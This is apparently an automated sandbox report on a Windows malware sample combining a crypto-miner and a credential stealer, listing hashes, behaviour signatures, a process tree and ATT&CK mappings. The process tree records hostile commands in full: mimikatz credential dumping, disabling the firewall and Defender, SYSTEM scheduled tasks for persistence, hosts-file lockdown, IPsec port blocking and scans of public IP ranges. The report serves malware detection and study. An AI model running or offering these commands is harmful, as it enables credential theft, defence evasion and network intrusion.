Analysis
-
max time kernel
162s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
17/04/2024, 07:36
General
-
Target
2024-04-17_a21a33c623b08fdab93e73c69706585d_hacktools_icedid_mimikatz.exe
-
Size
7.2MB
-
MD5
a21a33c623b08fdab93e73c69706585d
-
SHA1
ed708bea10094a1f8166b1e8e433fb393e94a3e5
-
SHA256
06ac845daddb3f30dcef4892133a67a53b9c84b37b9e6ad34b147018b2293324
-
SHA512
08f6d2a9afd1457905c78f192687f5243c2106e13204c8b2abb2c7c05c2713a4e4f0103c0d26044bf2ec26b26d6f0cf1a0a14731fd3a01f2461e6d93cb3b9212
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (24097) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 37 IoCs
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe"C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-04-17_a21a33c623b08fdab93e73c69706585d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-17_a21a33c623b08fdab93e73c69706585d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qthbqyun\iebbknt.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\qthbqyun\iebbknt.exeC:\Windows\qthbqyun\iebbknt.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4116,i,7064649017625232947,17746804975634116675,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:81⤵
-
C:\Windows\qthbqyun\iebbknt.exeC:\Windows\qthbqyun\iebbknt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\egchifmfz\cuinvnfkc\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\egchifmfz\cuinvnfkc\wpcap.exeC:\Windows\egchifmfz\cuinvnfkc\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\egchifmfz\cuinvnfkc\qqqgjjtwn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\egchifmfz\cuinvnfkc\Scant.txt2⤵
-
C:\Windows\egchifmfz\cuinvnfkc\qqqgjjtwn.exeC:\Windows\egchifmfz\cuinvnfkc\qqqgjjtwn.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\egchifmfz\cuinvnfkc\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\egchifmfz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\egchifmfz\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\egchifmfz\Corporate\vfshost.exeC:\Windows\egchifmfz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kthbzuqwh" /ru system /tr "cmd /c C:\Windows\ime\iebbknt.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kthbzuqwh" /ru system /tr "cmd /c C:\Windows\ime\iebbknt.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qycechtui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qycechtui" /ru system /tr "cmd /c echo Y|cacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ugumutpzf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ugumutpzf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 768 C:\Windows\TEMP\egchifmfz\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 316 C:\Windows\TEMP\egchifmfz\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 2148 C:\Windows\TEMP\egchifmfz\2148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 2528 C:\Windows\TEMP\egchifmfz\2528.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 2648 C:\Windows\TEMP\egchifmfz\2648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 2792 C:\Windows\TEMP\egchifmfz\2792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 708 C:\Windows\TEMP\egchifmfz\708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 3752 C:\Windows\TEMP\egchifmfz\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 3948 C:\Windows\TEMP\egchifmfz\3948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 4012 C:\Windows\TEMP\egchifmfz\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 3136 C:\Windows\TEMP\egchifmfz\3136.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 4104 C:\Windows\TEMP\egchifmfz\4104.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\egchifmfz\cuinvnfkc\scan.bat2⤵
-
C:\Windows\egchifmfz\cuinvnfkc\uwjwncpab.exeuwjwncpab.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 1724 C:\Windows\TEMP\egchifmfz\1724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 5064 C:\Windows\TEMP\egchifmfz\5064.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 4652 C:\Windows\TEMP\egchifmfz\4652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 2252 C:\Windows\TEMP\egchifmfz\2252.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\egchifmfz\weqtubtyu.exeC:\Windows\TEMP\egchifmfz\weqtubtyu.exe -accepteula -mp 4456 C:\Windows\TEMP\egchifmfz\4456.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\ditziw.exeC:\Windows\SysWOW64\ditziw.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iebbknt.exe1⤵
-
C:\Windows\ime\iebbknt.exeC:\Windows\ime\iebbknt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\qthbqyun\iebbknt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iebbknt.exe1⤵
-
C:\Windows\ime\iebbknt.exeC:\Windows\ime\iebbknt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jubqiuwwk\ebtiyu.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.1MB
MD5c8804059277f40682b9eee642aafb17f
SHA1ffcee951b24420b16d71504aef486f8493b817cb
SHA25652a377b415c4a46dada35a791ea68e444286e5918413dc1d35c421031313f3f7
SHA5126555e9770372af9eca46a34952ab519e09b35416607f8d5f5ab3d7be39dbd1db3fd0417256b6d8a692fe575d42bb26b17d5e87e95ebbc63f4fb135dfe8ed5c4f
-
Filesize
4.0MB
MD5babf07bd23748698d4cf6c2383081adf
SHA15cb9787100a337d2ef166b0e7042753a8526b6cb
SHA25663c47160b47dadb97bfc4de9d13d9e3ce5cd2a0890bacdbffc2851eb802ca8a6
SHA512f774490b297533c5e0b2597998c2f25e0dbf1066d0d11257e505bde49bd49ce44ccd9f78f358dee75f8ac41f9ff9724469df0c1846b545c46941e0be6e8fc25e
-
Filesize
2.9MB
MD54f05867105b5746438cc2dba27ff3e42
SHA1a226c366ea8a1aa07fc67303d11ab5a9ffe0244a
SHA256f860d7c7e044b947bab279ef947583645cfaf5bc19e6e0c2b21270054bce8518
SHA5123b104b6a52da5fb3ac54ff04f4fa92b73c40372565b855d36c4dea58172549e0a75f98b33f3b99e462ec555ed3eb5466c559be7a3df5e78a5b7e70e806ae15cc
-
Filesize
7.5MB
MD545c0f0af721dd20b29ba3f8c20ec745f
SHA12467cd526ddf2071abdf08fdcaf91ee792745b48
SHA25674a35744aefc5f72396a6a0948bfc6e71f93495eeffe7a3bcd715bc92088baa3
SHA5124fc5cb603e9c566717efb07391f79a11806cbb4095dde0c31843fbaaa930be5a7fc15e2613ad22e138c0448db8ecd88c8c3650eea6cc04d645606fb114b4548b
-
Filesize
44.8MB
MD57637e79a21e23603fa5021117b6f839f
SHA1cdf8d198f466763838809a0261a93623e09778a8
SHA2567e61555a84fa8e0209984832f9e4cbded59cb19a9a4f5d4aaa69add4218cb4cf
SHA5123e801a84458a0fc8564b94c7575b1be4fb22eb1a95749ee6c316a31f7b82814a190b7883198b321b0b40f0765e2e322074a6ba1525587f0baa63eb318098fa16
-
Filesize
33.4MB
MD57883ca43d015cabb228d94bcfb20906e
SHA1d239c93fccdaebe72ddd32a80b0e0a8fab796725
SHA25688d6ac7d9608e4e5d3e3ae711b820ddfbfd10e0d2433b44da3253d46ae406e95
SHA512606319fbb622b094bfb1bc8172c2502b32f1ba759286734d85f7a3ccb516629df22624a0911056c5bdea3221ea31f44017e4960cbe39b82cff3a9ff5c481ba99
-
Filesize
2.2MB
MD5367c450737584548c07b224e1accbe2a
SHA16e12e5bcf32272d938fbb74bc93936d54ab4e830
SHA25666bdaaa3e17794259a9fa3986273f6aaa1722e02641c8961208c334507247c84
SHA512591fedf3bc8abec8a7844fc2687147ec37de8d5f842280904d05cdbae4fa9b684431885c6aa7a25f03a48e46acd1c2b21db35daf367568c429c76688f33b7cbb
-
Filesize
20.5MB
MD54f6d0c8163fe21e76b74071df7698a58
SHA1d2da7ac2cd618dc2883b7ee197b3447abafa2f56
SHA2563aa2eb82755e8d4c6821bf59e533ea060e222c31749805e54bc1f8a568915075
SHA5123a79a4760e9970490aa1574b7162be7a05e892542b6014e6738af73fc59a3bc4bb24be653f394a78ebf7bcdaac5bddc1aea8ee904d9a72b94a5649959ae439f1
-
Filesize
10.0MB
MD507b5bd222e6b33b068511984c6c444ee
SHA1384f4a5a74fcf23e3ab00426407b58bc46c768dd
SHA25667dd3e7acfa1b86d81f77633df75e6391446c69d8d1a5b7b3ecad21069cdd973
SHA51268286924106d61025e3f78c47b73a47521c041fa1c1b74896a6d8ab2bf025c0207086bfa365d0b4bdfaa57f981bc3554d782f0ec77e4c744376f222665ee76f0
-
Filesize
26.8MB
MD55b106a84b5854a94714926f5693084a0
SHA1a3352e5746fe357670e258361f3964a56865f61d
SHA256845599239cbdaf4ad4c7923d70420c4d8a7464c027016c50ce5e3f78e3bd66e8
SHA51222a37f81bdb9465ed5c99610bc9c8ef9d41b5cbc674f06fc2fad170e449a7e5171bbd70c6cf9ad47f12504cbca3816e01d8ce73ee9416372b40faf4fdd1ef0b9
-
Filesize
814KB
MD5b4b133a8e74defe516d1eb07c239eee9
SHA11706dc9ef8c8f22df9a7757148de6f5777d0497a
SHA256b16160296036dc8b9aceb07ea9031945e9777f7edce6ed28c772d4814b0a038a
SHA5125e4ca29df9355ee695bf4903ede20c74fe2b1e4bcbb1934d8b1bd4f9020db3cd6ba3587abc5441f0263560ab9e0e6bdf4d8a1e112a576c886d2941d9e541dd30
-
Filesize
2.0MB
MD5e3f4ba7de8e9b745209cfc51687ca661
SHA1dae597ba2969fe46202318b25cdeda9c25077a33
SHA256cdbc9f5d79ab8131546cf73d72f0d28e51f543a15c4335e564efffe854e65554
SHA512880fc33c63259abfe8133d17e5c3acbbe82e502f402d79ee66850e5f48fc4b87b2f23120bc790c0876dabefed4e71c58ec2c5c34805f7671ba0410a287e364d8
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
